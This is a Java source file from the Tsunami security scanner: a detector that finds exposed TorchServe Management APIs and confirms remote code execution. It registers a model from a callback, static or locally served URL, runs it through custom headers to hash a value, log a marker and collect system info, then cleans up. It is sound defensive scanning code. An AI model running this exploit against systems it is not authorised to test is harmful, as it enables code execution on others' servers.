/*
 * Copyright 2023 Google LLC
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 * http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */
package com.google.tsunami.plugins.detectors.rce.torchserve;

import static com.google.common.base.Preconditions.checkNotNull;

import com.google.common.flogger.GoogleLogger;
import com.google.errorprone.annotations.CanIgnoreReturnValue;
import com.google.gson.Gson;
import com.google.gson.GsonBuilder;
import com.google.gson.JsonArray;
import com.google.gson.JsonElement;
import com.google.gson.JsonObject;
import com.google.gson.JsonParseException;
import com.google.gson.JsonParser;
import com.google.tsunami.common.data.NetworkServiceUtils;
import com.google.tsunami.common.net.http.HttpClient;
import com.google.tsunami.common.net.http.HttpHeaders;
import com.google.tsunami.common.net.http.HttpMethod;
import com.google.tsunami.common.net.http.HttpRequest;
import com.google.tsunami.common.net.http.HttpResponse;
import com.google.tsunami.plugin.payload.Payload;
import com.google.tsunami.plugin.payload.PayloadGenerator;
import com.google.tsunami.proto.AdditionalDetail;
import com.google.tsunami.proto.NetworkService;
import com.google.tsunami.proto.PayloadGeneratorConfig;
import com.google.tsunami.proto.Severity;
import com.google.tsunami.proto.TextData;
import java.io.IOException;
import java.security.MessageDigest;
import java.time.Instant;
import java.util.ArrayList;
import java.util.List;
import java.util.Locale;
import javax.inject.Inject;
import okhttp3.HttpUrl;
import org.checkerframework.checker.nullness.qual.Nullable;

/**
 * Detects an exposed TorchServe Management API and, depending on the configured {@link
 * ExploitationMode}, tries to confirm remote code execution by registering a model on the target.
 *
 * <p>Instances keep per-scan state in mutable fields (the {@link Details} object, the callback
 * payload, the local web server flag) without any synchronization, so a single instance must not
 * scan several services concurrently.
 */
public class TorchServeExploiter {
  private static final GoogleLogger logger = GoogleLogger.forEnclosingClass();

  // Gson instances are immutable once built, so one pretty-printer is shared by all calls.
  private static final Gson PRETTY_GSON = new GsonBuilder().setPrettyPrinting().create();

  private final HttpClient httpClient;
  public final Details details;
  private final PayloadGenerator payloadGenerator;
  private final TorchServeManagementAPIExploiterWebServer webServer;
  // Callback payload generated for the current scan; null until getTsunamiCallbackUrl() runs.
  private Payload payload;
  public TorchServeRandomUtils randomUtils;
  // True while the local web server started by serveExploitFile() is running, so cleanup only
  // stops a server that this exploiter actually started.
  private boolean webServerStarted = false;

  enum ExploitationMode {
    // Just detect the TorchServe Management API, do not attempt to exploit.
    BASIC,
    // Provide Tsunami callback server's URL as a model source, consider any callback as a
    // confirmation.
    SSRF,
    // Provide a static URL as a model source, verify code execution directly.
    STATIC,
    // Serve a model locally, verify code execution directly.
    LOCAL
  }

  /**
   * Effective exploit settings plus the data collected while scanning a target.
   *
   * <p>This is a non-static inner class because it reads the enclosing exploiter's {@code
   * payloadGenerator} (both while resolving the "auto" mode and while building the report).
   */
  public class Details {
    // Effective settings (merged from config file and cli args)
    public ExploitationMode exploitationMode;
    public String staticUrl;
    public String localBindHost;
    public int localBindPort;
    public String localAccessibleUrl;

    // Data collected during the exploit
    public List<String> models;
    public boolean hashVerification = false;
    public boolean callbackVerification = false;
    public String systemInfo;
    public boolean cleanupFailed = false;
    public String modelName;
    public String targetUrl;
    public String exploitUrl;
    public String messageLogged;

    static final String LOG_MESSAGE =
        "Tsunami TorchServe Plugin: Detected and executed. Refer to Tsunami Security Scanner repo"
            + " for details. No malicious activity intended. Timestamp: %s";

    /**
     * Creates the details, merging configuration with command line arguments (CLI wins).
     *
     * @param config Configuration object.
     * @param args Command line arguments.
     * @throws IllegalArgumentException if the mode is unknown or a mode's required settings are
     *     missing or invalid.
     */
    public Details(TorchServeManagementApiConfig config, TorchServeManagementApiArgs args) {
      initializeExploitationMode(args, config);
      initializeUrls(args, config);
      validateParameters();
    }

    /**
     * Resolves the exploitation mode. "auto" (case-insensitive), or no mode at all, selects SSRF
     * when Tsunami's callback server is enabled and BASIC otherwise.
     */
    private void initializeExploitationMode(
        TorchServeManagementApiArgs args, TorchServeManagementApiConfig config) {
      String mode = args.exploitationMode != null ? args.exploitationMode : config.exploitationMode;
      if (mode == null || mode.trim().equalsIgnoreCase("auto")) {
        this.exploitationMode =
            payloadGenerator.isCallbackServerEnabled()
                ? ExploitationMode.SSRF
                : ExploitationMode.BASIC;
        return;
      }
      try {
        // Locale.ROOT: under e.g. a Turkish default locale "basic".toUpperCase() is "BASİC".
        this.exploitationMode = ExploitationMode.valueOf(mode.trim().toUpperCase(Locale.ROOT));
      } catch (IllegalArgumentException e) {
        throw new IllegalArgumentException(
            "Invalid TorchServe exploitation mode '"
                + mode
                + "', expected one of: auto, basic, ssrf, static, local",
            e);
      }
    }

    /** Copies URL/bind settings, preferring CLI arguments over the configuration file. */
    private void initializeUrls(
        TorchServeManagementApiArgs args, TorchServeManagementApiConfig config) {
      this.staticUrl = args.staticUrl != null ? args.staticUrl : config.staticUrl;
      this.localBindHost = args.localBindHost != null ? args.localBindHost : config.localBindHost;
      this.localBindPort = args.localBindPort != 0 ? args.localBindPort : config.localBindPort;
      this.localAccessibleUrl =
          args.localAccessibleUrl != null ? args.localAccessibleUrl : config.localAccessibleUrl;
    }

    /** Fails fast when the selected mode lacks the settings it needs. */
    private void validateParameters() {
      if (this.exploitationMode == ExploitationMode.STATIC && this.staticUrl == null) {
        throw new IllegalArgumentException(
            "Static mode requires --torchserve-management-api-model-static-url");
      }

      if (this.exploitationMode == ExploitationMode.LOCAL) {
        if (this.localBindHost == null
            || this.localBindPort == 0
            || this.localAccessibleUrl == null) {
          throw new IllegalArgumentException(
              "Local mode requires --torchserve-management-api-local-bind-host,"
                  + " --torchserve-management-api-local-bind-port and"
                  + " --torchserve-management-api-local-accessible-url");
        }
        // serveExploitFile() builds the model URL from this value, so it must parse.
        if (HttpUrl.parse(this.localAccessibleUrl) == null) {
          throw new IllegalArgumentException(
              "--torchserve-management-api-local-accessible-url is not a valid http(s) URL: "
                  + this.localAccessibleUrl);
        }
      }
    }

    /** Clears everything collected for a previous target; configuration fields are untouched. */
    private void resetScanState() {
      this.models = null;
      this.hashVerification = false;
      this.callbackVerification = false;
      this.systemInfo = null;
      this.cleanupFailed = false;
      this.modelName = null;
      this.targetUrl = null;
      this.exploitUrl = null;
      this.messageLogged = null;
    }

    /** Returns CRITICAL when code execution or the callback was confirmed, LOW otherwise. */
    public Severity getSeverity() {
      return isVerified() ? Severity.CRITICAL : Severity.LOW;
    }

    /** Returns true if either the hash check or the callback check succeeded. */
    public boolean isVerified() {
      return this.hashVerification || this.callbackVerification;
    }

    /** Builds the human-readable "Additional details" section of the report for the mode used. */
    public AdditionalDetail generateAdditionalDetails() {
      StringBuilder additionalDetails = new StringBuilder();

      switch (this.exploitationMode) {
        case BASIC:
          additionalDetails.append(
              "Callback verification is not enabled in Tsunami configuration, so the exploit"
                  + " could not be confirmed and only the Management API detection is reported."
                  + " It is recommended to enable callback verification for more conclusive"
                  + " vulnerability assessment.");
          appendModelList(additionalDetails, "\n");
          break;
        case SSRF:
          additionalDetails.append(
              "A callback was received from the target while adding a new model, confirming the"
                  + " exploit. Code execution was not verified directly. For a more direct"
                  + " confirmation of remote code execution, consider using STATIC or LOCAL"
                  + " modes.");
          appendModelList(additionalDetails, "\n");
          break;
        case STATIC:
        case LOCAL:
          additionalDetails
              .append(
                  "Code execution was verified by adding a new model to the target and performing"
                      + " following actions:\n")
              .append(
                  "  - Calculating a hash of a random value and comparing it to the value returned"
                      + " by the target ("
                      + (this.hashVerification ? "Success" : "Failure")
                      + ")\n");

          if (payloadGenerator.isCallbackServerEnabled()) {
            additionalDetails.append(
                "  - Sending a callback to the target and confirming that the callback URL was"
                    + " received ("
                    + (this.callbackVerification ? "Success" : "Failure")
                    + ")\n");
          }

          // The info request may have failed even though verification succeeded.
          String systemInfoText =
              this.systemInfo == null ? "(not available)" : prettyPrintJson(this.systemInfo);
          additionalDetails
              .append("System info collected from the target:\n")
              .append(systemInfoText)
              .append("\n\n")
              .append("The following log entry was generated on the target:\n\n")
              .append(this.messageLogged);
          appendModelList(additionalDetails, "\n\n");
          break;
      }

      return AdditionalDetail.newBuilder()
          .setDescription("Additional details")
          .setTextData(TextData.newBuilder().setText(additionalDetails.toString()).build())
          .build();
    }

    /** Appends the bulleted list of pre-existing models (if any), preceded by {@code separator}. */
    private void appendModelList(StringBuilder out, String separator) {
      if (this.models == null || this.models.isEmpty()) {
        return;
      }
      out.append(separator)
          .append("Models found on the target:\n  - ")
          .append(String.join("\n  - ", this.models));
    }
  }

  @Inject
  public TorchServeExploiter(
      TorchServeManagementApiConfig config,
      TorchServeManagementApiArgs args,
      HttpClient httpClient,
      PayloadGenerator payloadGenerator,
      TorchServeManagementAPIExploiterWebServer webServer,
      TorchServeRandomUtils randomUtils) {
    this.httpClient =
        checkNotNull(httpClient, "httpClient must not be null")
            .modify()
            .setFollowRedirects(false)
            .build();
    // Must be assigned before Details is constructed: Details reads payloadGenerator.
    this.payloadGenerator = checkNotNull(payloadGenerator, "payloadGenerator must not be null");
    this.details =
        new Details(
            checkNotNull(config, "config must not be null"),
            checkNotNull(args, "args must not be null"));
    this.webServer = checkNotNull(webServer, "webServer must not be null");
    this.randomUtils = checkNotNull(randomUtils, "randomUtils must not be null");
  }

  /**
   * Verifies if the target service is vulnerable to TorchServe Management API RCE.
   *
   * <p>Any model registered on the target and any local web server started for the scan are
   * cleaned up before this method returns.
   *
   * @param service The network service to be checked.
   * @return Details of the vulnerability if found, null otherwise.
   */
  public @Nullable Details isServiceVulnerable(NetworkService service) {
    // Details and the callback payload are reused across scans; clear anything collected for a
    // previous target so it can neither be reported nor "cleaned up" again for this one.
    this.details.resetScanState();
    this.payload = null;

    HttpUrl targetUrl = buildTargetUrl(service);
    if (targetUrl == null) {
      logger.atWarning().log("Unable to build a valid target URL for the network service");
      return null;
    }

    try {
      return isServiceVulnerable(targetUrl);
    } catch (IOException e) {
      logger.atWarning().withCause(e).log(
          "Failed to check if service is vulnerable due to network error");
    } catch (Exception e) {
      logger.atSevere().withCause(e).log(
          "Unexpected error occurred while checking service vulnerability");
    } finally {
      cleanupExploit();
    }
    return null;
  }

  /** Runs fingerprinting and, depending on the mode, the exploit against {@code targetUrl}. */
  private @Nullable Details isServiceVulnerable(HttpUrl targetUrl) throws IOException {
    if (!isTorchServe(targetUrl)) {
      return null;
    }
    logger.atInfo().log("Target matches TorchServe Management API fingerprint");

    // Scrape the list of models from the target and pick a name that is not in use
    String modelName = getModelName(targetUrl);

    String url;
    switch (this.details.exploitationMode) {
      case BASIC:
        logger.atFine().log("BASIC MODE");
        // It looks like TorchServe management API, but we can't exploit it as callback
        // functionality has not been enabled
        logger.atInfo().log("Callback verification is not enabled, skipping exploit");
        return this.details;
      case SSRF:
        logger.atFine().log("SSRF MODE");
        // Set the model URL to the Tsunami callback server, consider any callback as a confirmation
        executeExploit(targetUrl, getTsunamiCallbackUrl(), modelName);
        return checkTsunamiCallbackUrl() ? this.details : null;
      case STATIC:
        logger.atFine().log("STATIC MODE");
        // Use the provided URL as a model source, confirm code execution directly
        url = this.details.staticUrl;
        break;
      case LOCAL:
        logger.atFine().log("LOCAL MODE");
        // Serve the model locally, confirm code execution directly
        url = serveExploitFile(modelName);
        break;
      default:
        throw new IllegalArgumentException("Invalid mode: " + this.details.exploitationMode);
    }

    // Common verification for STATIC and LOCAL
    executeExploit(targetUrl, url, modelName);

    // 1. Was the model added to the list of models?
    if (!modelExists(targetUrl, modelName)) {
      return null;
    }

    // 2. Can we simulate code execution (hash + callback)?
    if (!verifyExploit(targetUrl, modelName)) {
      return null;
    }

    // Report confirmed vulnerability
    return this.details;
  }

  /**
   * Verifies that the model was added to the list of models on the target.
   *
   * <p>A registered model is described by a non-empty JSON array. TorchServe reports failures as a
   * JSON object (e.g. {@code {"code": 500, ...}}, see {@link #executeExploit}), so merely receiving
   * JSON is not proof that the model exists.
   */
  private boolean modelExists(HttpUrl targetUrl, String modelName) throws IOException {
    HttpUrl url = targetUrl.newBuilder().addPathSegment("models").addPathSegment(modelName).build();
    JsonArray response = sendHttpRequestGetJsonArray(HttpMethod.GET, url, null);
    return response != null && response.size() > 0;
  }

  /**
   * Verifies if the exploit was successful on the target server.
   *
   * <p>This method simulates code execution through hash calculation and, if enabled, through
   * Tsunami's callback server. It also logs and collects system info from the target.
   *
   * @param targetUrl The URL of the target server.
   * @param modelName The name of the model used in the exploit.
   * @return True if the exploit is verified successfully, false otherwise.
   * @throws IOException If an I/O error occurs during the verification process.
   */
  private boolean verifyExploit(HttpUrl targetUrl, String modelName) throws IOException {
    // Simulate code execution through a hash calculation
    String randomValue = randomUtils.getRandomValue();
    String hashReceived = interact(targetUrl, modelName, "tsunami-execute", randomValue);
    // interact() returns null when the target gave no usable answer; that is simply a failure.
    this.details.hashVerification =
        hashReceived != null && randomUtils.validateHash(hashReceived, randomValue);
    boolean verified = this.details.hashVerification;

    // Simulate code execution through Tsunami's callback server
    if (this.payloadGenerator.isCallbackServerEnabled()) {
      String callbackUrl = getTsunamiCallbackUrl();
      interact(targetUrl, modelName, "tsunami-callback", callbackUrl);
      verified |= checkTsunamiCallbackUrl();
    }

    // One of the verification methods must succeed for the exploit to be confirmed
    if (!verified) {
      return false;
    }

    // Generate the log file entry on the remote server (template + timestamp) and collect
    // system info
    this.details.messageLogged = String.format(Details.LOG_MESSAGE, Instant.now().toString());
    interact(targetUrl, modelName, "tsunami-log", this.details.messageLogged);
    this.details.systemInfo = interact(targetUrl, modelName, "tsunami-info", "True");

    return true;
  }

  /**
   * Sends an HTTP request to interact with a specific model on the TorchServe server.
   *
   * <p>Generally a model is reached through the Inference API (default port 8080), which is
   * separate from the Management API (default port 8081). However, the Management API's describe
   * endpoint also invokes the model when the {@code customized=true} query parameter is set, as
   * documented at https://pytorch.org/serve/management_api.html#:~:text=customized=true. Using
   * this trick avoids having to locate the Inference API, which might be remapped to an arbitrary
   * port or not exposed at all.
   *
   * <p>The payload is passed through a {@code tsunami-*} header and the model's answer is read
   * from the {@code customizedMetadata} field of the first element of the response. Look at
   * model.py for the supported headers and their meaning.
   *
   * <pre>
   *   $ curl http://torchserve-081:8081/models/somerandomname?customized=true \
   *              -H 'tsunami-header: &lt;An input value goes here&gt;'
   *   [
   *     {
   *       "modelName": "somerandomname",
   *       "modelVersion": "1.0",
   *       "modelUrl": "https://s3.amazonaws.com/model.mar",
   *       "runtime": "python",
   *       "minWorkers": 1,
   *       "maxWorkers": 1,
   *       "batchSize": 1,
   *       "maxBatchDelay": 100,
   *       "loadedAtStartup": false,
   *       "workers": [
   *         {
   *           "id": "9029",
   *           "startTime": "2023-12-18T22:50:13.994Z",
   *           "status": "READY",
   *           "memoryUsage": 227737600,
   *           "pid": 1719,
   *           "gpu": false,
   *           "gpuUsage": "N/A"
   *         }
   *       ],
   *       "customizedMetadata": "&lt;Output value appears here&gt;"
   *     }
   *   ]
   * </pre>
   *
   * @param targetUrl The base URL of the TorchServe Management API.
   * @param modelName The name of the model to interact with.
   * @param headerName The name of the header to send in the request.
   * @param headerValue The value of the header to send in the request.
   * @return The value of 'customizedMetadata', or null if the response does not have the expected
   *     shape.
   * @throws IOException If an I/O error occurs during the HTTP request.
   */
  private @Nullable @CanIgnoreReturnValue String interact(
      HttpUrl targetUrl, String modelName, String headerName, String headerValue)
      throws IOException {
    HttpHeaders header = HttpHeaders.builder().addHeader(headerName, headerValue).build();
    HttpUrl url =
        targetUrl
            .newBuilder()
            .addPathSegment("models")
            .addPathSegment(modelName)
            .addQueryParameter("customized", "true")
            .build();

    JsonArray response = sendHttpRequestGetJsonArray(HttpMethod.GET, url, header);
    if (response == null || response.size() == 0 || !response.get(0).isJsonObject()) {
      return null;
    }
    JsonElement metadata = response.get(0).getAsJsonObject().get("customizedMetadata");
    if (metadata == null || !metadata.isJsonPrimitive()) {
      return null;
    }
    return metadata.getAsString();
  }

  /**
   * Constructs the target URL for a given network service.
   *
   * @param service The network service for which the URL is being constructed.
   * @return The web application root URL of the service, or null if it cannot be parsed.
   */
  private @Nullable HttpUrl buildTargetUrl(NetworkService service) {
    return HttpUrl.parse(NetworkServiceUtils.buildWebApplicationRootUrl(service));
  }

  /**
   * Generates a callback URL for Tsunami's payload generator.
   *
   * <p>The generated payload is remembered in {@code this.payload} so that {@link
   * #checkTsunamiCallbackUrl()} can later ask whether the callback was received.
   *
   * @return The generated callback URL for the Tsunami payload.
   */
  private String getTsunamiCallbackUrl() {
    PayloadGeneratorConfig config =
        PayloadGeneratorConfig.newBuilder()
            .setVulnerabilityType(PayloadGeneratorConfig.VulnerabilityType.SSRF)
            .setInterpretationEnvironment(
                PayloadGeneratorConfig.InterpretationEnvironment.INTERPRETATION_ANY)
            .setExecutionEnvironment(PayloadGeneratorConfig.ExecutionEnvironment.EXEC_ANY)
            .build();
    this.payload = this.payloadGenerator.generate(config);
    return this.payload.getPayload();
  }

  /** Records and returns whether the most recently generated callback payload was triggered. */
  private boolean checkTsunamiCallbackUrl() {
    this.details.callbackVerification = this.payload != null && this.payload.checkIfExecuted();
    return this.details.callbackVerification;
  }

  /**
   * Checks whether the specified target URL corresponds to a TorchServe management API.
   *
   * <p>A service that does not answer {@code /api-description} with a JSON object is simply not
   * TorchServe; that is not treated as an error.
   *
   * @param targetUrl The URL of the target service to be checked.
   * @return True if the target URL is a TorchServe management API, false otherwise.
   * @throws IOException If a network error occurs during the HTTP request.
   */
  private boolean isTorchServe(HttpUrl targetUrl) throws IOException {
    JsonObject response =
        sendHttpRequestGetJsonObject(HttpMethod.GET, targetUrl, "api-description");
    return response != null && isTorchServeResponse(response);
  }

  /**
   * Determines if the given response matches the expected signature of a TorchServe API.
   *
   * <p>Expected JSON structure (abbreviated):
   *
   * <pre>
   * {
   *   "openapi": "3.0.1",
   *   "info": { "title": "TorchServe APIs", ... },
   *   "paths": { "/models": { "post": { "operationId": "registerModel", ... } } }
   * }
   * </pre>
   *
   * @param response The JSON object representing the HTTP response to analyze.
   * @return True if the response matches the expected TorchServe signature, false otherwise.
   */
  private boolean isTorchServeResponse(JsonObject response) {
    String apiTitle = getNestedKey(response, "info", "title");
    String registerModel = getNestedKey(response, "paths", "/models", "post", "operationId");

    return response.has("openapi")
        && "TorchServe APIs".equals(apiTitle)
        && "registerModel".equals(registerModel);
  }

  /**
   * Retrieves a nested key value from a JSON object.
   *
   * @param object The JSON object from which to extract the value.
   * @param keys A sequence of keys; every key but the last must name a nested JSON object.
   * @return The value of the last key rendered as a string if it is a JSON primitive, or null if
   *     no keys are given, any key is missing, or an element has an unexpected type.
   */
  private @Nullable String getNestedKey(@Nullable JsonObject object, String... keys) {
    if (object == null || keys.length == 0) {
      return null;
    }
    JsonObject current = object;
    for (int i = 0; i < keys.length - 1; i++) {
      JsonElement child = current.get(keys[i]);
      if (child == null || !child.isJsonObject()) {
        return null;
      }
      current = child.getAsJsonObject();
    }
    JsonElement value = current.get(keys[keys.length - 1]);
    if (value == null || !value.isJsonPrimitive()) {
      return null;
    }
    return value.getAsString();
  }

  /**
   * Generates a unique model name that does not already exist on the target TorchServe server.
   *
   * <p>As a side effect, the existing model names are stored in {@code details.models}.
   *
   * @param targetUrl The URL of the TorchServe server to check for existing model names.
   * @return A unique model name.
   * @throws IOException If a network error occurs during the HTTP request.
   */
  private String getModelName(HttpUrl targetUrl) throws IOException {
    List<String> models = getModelNames(targetUrl);
    this.details.models = models;

    return generateRandomModelName(models);
  }

  /**
   * Generates a random model name that is not present in the provided list of existing models.
   *
   * @param existingModels A list of model names that already exist on the server.
   * @return A randomly generated, unique model name.
   */
  private String generateRandomModelName(List<String> existingModels) {
    String modelName;
    do {
      modelName = randomUtils.getRandomValue();
    } while (existingModels.contains(modelName));
    return modelName;
  }

  /**
   * Retrieves a list of model names from the TorchServe server.
   *
   * <p>Entries without a string {@code modelName} are skipped.
   *
   * @param targetUrl The URL of the TorchServe server.
   * @return A list of model names present on the server (empty if none could be read).
   * @throws IOException If a network error occurs during the HTTP request.
   */
  private List<String> getModelNames(HttpUrl targetUrl) throws IOException {
    List<String> models = new ArrayList<>();
    for (JsonObject model : listModelObjects(targetUrl)) {
      String name = getNestedKey(model, "modelName");
      if (name != null) {
        models.add(name);
      }
    }
    return models;
  }

  /**
   * Fetches {@code GET /models} and returns the entries of its {@code models} array that are JSON
   * objects.
   *
   * <p>Expected JSON structure:
   *
   * <pre>
   * "models": [
   *   {
   *     "modelName": "squeezenet1_1",
   *     "modelUrl": "https://torchserve.pytorch.org/mar_files/squeezenet1_1.mar"
   *   },
   * </pre>
   *
   * <p>TODO: there's pagination with default limit of 100 models per page
   * https://github.com/pytorch/serve/blob/master/docs/management_api.md#list-models
   *
   * @throws IOException If a network error occurs during the HTTP request.
   */
  private List<JsonObject> listModelObjects(HttpUrl targetUrl) throws IOException {
    List<JsonObject> result = new ArrayList<>();
    JsonObject response = sendHttpRequestGetJsonObject(HttpMethod.GET, targetUrl, "models");
    if (response == null) {
      return result;
    }
    JsonElement modelsElement = response.get("models");
    if (modelsElement == null || !modelsElement.isJsonArray()) {
      return result;
    }
    for (JsonElement model : modelsElement.getAsJsonArray()) {
      if (model.isJsonObject()) {
        result.add(model.getAsJsonObject());
      }
    }
    return result;
  }

  /**
   * Removes a model from the TorchServe server by its name.
   *
   * @param targetUrl The URL of the TorchServe server.
   * @param modelName The name of the model to be removed.
   * @throws IOException If a network error occurs during the HTTP request.
   */
  private void removeModelByName(HttpUrl targetUrl, String modelName) throws IOException {
    sendHttpRequestGetJsonObject(HttpMethod.DELETE, targetUrl, "models", modelName);
  }

  /**
   * Removes every model whose {@code modelUrl} equals {@code url} from the TorchServe server.
   *
   * <p>Best effort: failures are logged and never abort the exploit attempt.
   *
   * @param targetUrl The URL of the TorchServe server.
   * @param url The URL of the model to be removed.
   */
  private void removeModelByUrl(HttpUrl targetUrl, String url) {
    try {
      for (JsonObject model : listModelObjects(targetUrl)) {
        String modelName = getNestedKey(model, "modelName");
        if (modelName != null && url.equals(getNestedKey(model, "modelUrl"))) {
          removeModelByName(targetUrl, modelName);
        }
      }
    } catch (IOException e) {
      logger.atFine().withCause(e).log("Unable to remove existing models with URL %s", url);
    }
  }

  /**
   * Starts the local web server and returns the URL under which the exploit file is served.
   *
   * <p>Used in LOCAL exploitation mode. The server is stopped again by {@link #cleanupExploit()}.
   *
   * @param modelName The name of the model to be used in the exploit file's name.
   * @return The URL where the exploit file is served.
   * @throws IOException If an error occurs while starting the web server.
   */
  private String serveExploitFile(String modelName) throws IOException {
    this.webServer.start(this.details.localBindHost, this.details.localBindPort);
    this.webServerStarted = true;
    HttpUrl baseUrl =
        checkNotNull(
            HttpUrl.parse(this.details.localAccessibleUrl),
            "Invalid local accessible URL: %s",
            this.details.localAccessibleUrl);
    return baseUrl.newBuilder().addPathSegment(modelName + ".mar").build().toString();
  }

  /**
   * Executes the exploit against the target TorchServe service.
   *
   * <p>Sends {@code POST /models} asking the target to register {@code exploitUrl} under {@code
   * modelName}. The target URL and model name are recorded first, so that {@link
   * #cleanupExploit()} can remove the model even if this request fails midway.
   *
   * @param targetUrl The URL of the target TorchServe service.
   * @param exploitUrl The URL of the exploit payload.
   * @param modelName The name of the model to register.
   * @return True if the exploit execution led to successful model registration, false otherwise.
   * @throws IOException If a network error occurs during the HTTP request.
   */
  private @CanIgnoreReturnValue boolean executeExploit(
      HttpUrl targetUrl, String exploitUrl, String modelName) throws IOException {
    HttpUrl url =
        targetUrl
            .newBuilder()
            .addPathSegment("models")
            .addEncodedQueryParameter("url", exploitUrl)
            .addQueryParameter("batch_size", "1")
            .addQueryParameter("initial_workers", "1")
            .addQueryParameter("synchronous", "true")
            .addQueryParameter("model_name", modelName)
            .build();
    this.details.targetUrl = targetUrl.toString();
    this.details.exploitUrl = exploitUrl;
    this.details.modelName = modelName;

    // Remove any existing models with the same URL
    removeModelByUrl(targetUrl, exploitUrl);

    JsonObject response = sendHttpRequestGetJsonObject(HttpMethod.POST, url);
    if (response == null) {
      return false;
    }

    // Expected response (200):
    //
    // { "status": "Model \"squeezenet1_1\" Version: 1.0 registered with 1 initial workers" }
    //
    // Expected response (500):
    // {
    //   "code": 500,
    //   "type": "InternalServerException",
    //   "message": "Model file already exists squeezenet1_1.mar"
    // }
    String message = getNestedKey(response, "status");
    return message != null && message.contains("registered with 1 initial workers");
  }

  /**
   * Performs cleanup operations after exploit execution.
   *
   * <p>Removes the model registered by {@link #executeExploit} (if any) and stops the local web
   * server if this exploiter started it. A network failure while removing the model is recorded in
   * {@code details.cleanupFailed}.
   */
  private void cleanupExploit() {
    try {
      if (this.details.modelName != null && this.details.targetUrl != null) {
        HttpUrl targetUrl = HttpUrl.parse(this.details.targetUrl);
        if (targetUrl != null) {
          removeModelByName(targetUrl, this.details.modelName);
        }
      }
    } catch (IOException e) {
      logger.atWarning().withCause(e).log("Failed to cleanup exploit");
      this.details.cleanupFailed = true;
    } finally {
      if (this.webServerStarted) {
        this.webServerStarted = false;
        this.webServer.stop();
      }
    }
  }

  /**
   * Sends an HTTP request and returns the response as a JsonObject.
   *
   * @param method The HTTP method to use for the request.
   * @param baseUrl The base URL for the request.
   * @param pathSegments Additional path segments to append to the base URL.
   * @return The response as a JsonObject, or null if the body is not a JSON object.
   * @throws IOException If a network error occurs during the HTTP request.
   */
  private @CanIgnoreReturnValue @Nullable JsonObject sendHttpRequestGetJsonObject(
      HttpMethod method, HttpUrl baseUrl, String... pathSegments) throws IOException {
    JsonElement json = sendHttpRequestGetJson(method, baseUrl, null, pathSegments);
    return json != null && json.isJsonObject() ? json.getAsJsonObject() : null;
  }

  /**
   * Sends an HTTP request and returns the response as a JsonArray.
   *
   * @param method The HTTP method to use for the request.
   * @param baseUrl The base URL for the request.
   * @param headers The HTTP headers to include in the request, or null for none.
   * @param pathSegments Additional path segments to append to the base URL.
   * @return The response as a JsonArray, or null if the body is not a JSON array.
   * @throws IOException If a network error occurs during the HTTP request.
   */
  private @Nullable JsonArray sendHttpRequestGetJsonArray(
      HttpMethod method, HttpUrl baseUrl, @Nullable HttpHeaders headers, String... pathSegments)
      throws IOException {
    JsonElement json = sendHttpRequestGetJson(method, baseUrl, headers, pathSegments);
    return json != null && json.isJsonArray() ? json.getAsJsonArray() : null;
  }

  /**
   * Sends an HTTP request and returns the response body as a JsonElement.
   *
   * @param method The HTTP method to use for the request.
   * @param baseUrl The base URL for the request.
   * @param headers The HTTP headers to include in the request, or null for none.
   * @param pathSegments Additional path segments to append to the base URL.
   * @return The response body as a JsonElement, or null if the response body is not valid JSON.
   * @throws IOException If a network error occurs during the HTTP request.
   */
  private @Nullable JsonElement sendHttpRequestGetJson(
      HttpMethod method, HttpUrl baseUrl, @Nullable HttpHeaders headers, String... pathSegments)
      throws IOException {
    HttpHeaders effectiveHeaders = headers != null ? headers : HttpHeaders.builder().build();

    HttpUrl url = baseUrl;
    if (pathSegments.length > 0) {
      url = url.newBuilder().addPathSegments(String.join("/", pathSegments)).build();
    }

    HttpRequest request =
        HttpRequest.builder().setHeaders(effectiveHeaders).setMethod(method).setUrl(url).build();
    HttpResponse response = this.httpClient.send(request);

    // A non-JSON body (e.g. an HTML page from an unrelated service) is not a network error.
    return response.bodyJson().orElse(null);
  }

  /**
   * Pretty prints a JSON string.
   *
   * @param json The JSON string to be pretty printed.
   * @return The pretty-printed version of the JSON string, or the original string (including
   *     null) if it's not valid JSON.
   */
  private @Nullable String prettyPrintJson(@Nullable String json) {
    if (json == null) {
      return null;
    }
    try {
      return PRETTY_GSON.toJson(new JsonParser().parse(json));
    } catch (JsonParseException e) {
      return json;
    }
  }
}
